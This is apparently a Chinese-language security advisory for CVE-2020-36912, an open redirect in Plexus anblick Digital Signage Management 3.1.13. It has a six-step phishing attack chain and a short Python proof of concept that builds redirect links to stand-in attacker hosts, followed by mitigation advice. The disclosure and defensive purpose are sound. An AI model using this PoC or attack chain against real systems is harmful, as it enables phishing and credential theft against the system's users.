CVE-2020-36912 Plexus anblick数字标牌管理系统开放重定向漏洞

漏洞信息

漏洞编号

CVE-2020-36912

漏洞类型

开放重定向

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Plexus anblick Digital Signage Management

漏洞概述

CVE-2020-36912是Plexus anblick数字标牌管理系统中存在的一个高危开放重定向（Open Redirect）漏洞。该漏洞影响版本3.1.13，源于应用程序对用户输入的'pagina' GET参数缺乏充分的验证和过滤。攻击者可以通过构造恶意的URL链接，利用该漏洞将不知情的用户重定向到任意外部网站。这种重定向常被用于网络钓鱼攻击，窃取用户凭据或传播恶意软件。由于该漏洞的CVSS评分高达9.8，属于严重级别，且攻击复杂度低、无需认证和用户交互即可利用，因此对使用该系统的企业构成严重安全威胁。开放重定向漏洞虽然看起来危害不如远程代码执行等漏洞严重，但经常被作为攻击链中的关键一环，用于构建更具欺骗性的社会工程攻击。

技术细节

该开放重定向漏洞存在于Plexus anblick数字标牌管理系统的登录页面脚本'PantallaLogin'中。漏洞的根本原因是应用程序直接将用户通过GET请求传递的'pagina'参数值用于重定向逻辑，而没有对参数值进行充分的有效性验证和安全检查。正常情况下，'pagina'参数可能用于指定登录成功后的跳转页面，但程序未限制其取值范围。攻击者可以构造类似/pantallalogin?pagina=https://attacker-controlled-site.com的恶意链接，当用户点击该链接并完成登录流程后，系统会根据'pagina'参数的值将用户重定向到攻击者指定的外部网站。由于重定向操作发生在系统域名下，用户会误以为仍在与可信网站交互，从而更容易被诱骗输入敏感信息或下载恶意内容。防御此类漏洞需要对重定向目标进行严格的白名单验证，或限制重定向只能发生在同源域内。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统使用的Plexus anblick数字标牌管理系统，并定位到存在漏洞的登录页面（/PantallaLogin）

STEP 2

步骤2

攻击者构造包含恶意'pagina'参数的URL，将重定向目标指向钓鱼网站或恶意资源

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或其他渠道诱导目标用户点击构造的恶意链接

STEP 4

步骤4

用户访问恶意链接后，页面正常显示登录界面，用户输入凭据进行登录

STEP 5

步骤5

用户提交登录信息后，系统根据'pagina'参数将用户自动重定向到攻击者控制的外部网站

STEP 6

步骤6

用户在钓鱼网站被诱骗输入敏感信息（如真实凭据、银行信息等），或下载恶意软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

## CVE-2020-36912 Open Redirect PoC
## Target: Plexus anblick Digital Signage Management 3.1.13
## Vulnerability: Open redirect via 'pagina' GET parameter in PantallaLogin

import urllib.parse

def generate_malicious_url(target_url, redirect_target):
    """
    Generate malicious URL for open redirect exploitation
    
    Args:
        target_url: Base URL of vulnerable application
        redirect_target: Malicious site to redirect victims to
    
    Returns:
        Malicious URL string
    """
    # Encode the redirect target to bypass basic filters
    encoded_target = urllib.parse.quote(redirect_target, safe='')
    
    # Construct the exploit URL with the vulnerable 'pagina' parameter
    malicious_url = f"{target_url}/PantallaLogin?pagina={encoded_target}"
    
    return malicious_url

# Example usage
exploit_url = generate_malicious_url(
    target_url="https://vulnerable-server.com",
    redirect_target="https://phishing-site.com"
)

print(f"Malicious URL: {exploit_url}")
print(f"When victim visits this URL and logs in, they will be redirected to phishing-site.com")

# Alternative direct PoC (unencoded)
# https://vulnerable-server.com/PantallaLogin?pagina=https://attacker.com

影响范围

Plexus anblick Digital Signage Management 3.1.13

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解风险：1）在前端JavaScript和后端同时实现重定向目标的验证逻辑，拒绝所有外部域名；2）使用会话级别的安全令牌替代直接传递重定向URL；3）配置Web应用防火墙规则检测和阻止包含外部域名的'pagina'参数请求；4）限制登录页面的重定向功能，仅允许跳转到预定义的内部页面；5）加强对用户的安全意识培训，提醒员工不要点击来源不明的登录链接。